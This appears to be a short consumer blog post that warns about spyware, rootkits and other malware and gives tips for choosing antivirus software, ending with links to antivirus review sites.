An unprotected computer is like a bank without security: thieves can easily loot the money and valuables kept in it. An unprotected computer is easily vulnerable to attack by many kinds of malicious software. Every year hundreds of malicious programs, such as viruses, spyware and trojans, are released into cyberspace. Some people do not even realise that malware is everywhere and that avoiding infection is a very difficult task; sometimes they do not realise that they have become the victim of a malware attack. There are many kinds of malware roaming the internet, and most of them are spyware. Viruses are made by skilled and experienced programmers around the world. Some malware is meant to destroy your computer or your reputation. More than eighty percent of the computers around the world are infected by malware, and this too is dominated by spyware.
Spyware is an application that is installed on our computer pretending to be some useful program. Spyware is commonly installed in browsers and can read the username and password we enter to access our accounts. There is another type of malware called a rootkit. Rootkits are created by hackers to access your computer without your knowledge for illegal activities, and you may be blamed for the actions performed by the hacker using the rootkit installed on your computer. To protect the system from the hazards of malware we have to install proper antivirus software.

Things to take care of while choosing an antivirus

There are many antivirus products available in the market. Each has its own advantages and limitations, as they are produced by different companies, and they are available for different platforms and requirements. Care should be taken in choosing an antivirus. Some useful tips for choosing antivirus software are given below:

  • Capability of detecting malware:
The capability of detecting malware mostly depends on the antivirus's database. If the database is large, it can detect more malware. The database contains the codes of the malware, so as the number of entries increases, the size of the database grows and the software can detect more malware.
  • Capability of cleaning or isolating the infected files:
Most of the antivirus products available today include the capability of cleaning infected files. If cleaning cannot be performed, the infected files are isolated. The cleaning capability differs between antivirus products: most of them cannot clean an infected file effectively, but they can effectively isolate it. Isolation, however, may result in data loss or the malfunctioning of some useful programs, so a powerful antivirus which has the capability of cleaning the file should be used.
  • User-friendliness:
Most antivirus products have a very good graphical user interface. This allows the user to use the antivirus in the most effective way and exploit it to its maximum. A good user interface allows a person with little knowledge about computers to use the software effectively.

  • Availability of updates:
Updating an antivirus is a very important thing to take care of. Most people think that there is not much use in updating the antivirus, but updating enables the software to detect new viruses: during an update the codes of the new viruses are entered into the antivirus's database. So check the availability of updates. Most antivirus vendors provide updates periodically.

  • Refer to sites containing antivirus reviews:
These sites help to choose an antivirus according to our needs. They list the advantages and limitations of different antivirus products. I have given some of the sites below:

http://anti-virus-software-review.toptenreviews.com/
http://www.consumersearch.com/antivirus-software

http://www.pcantivirusreviews.com/
http://www.reviewcentre.com/products2167.html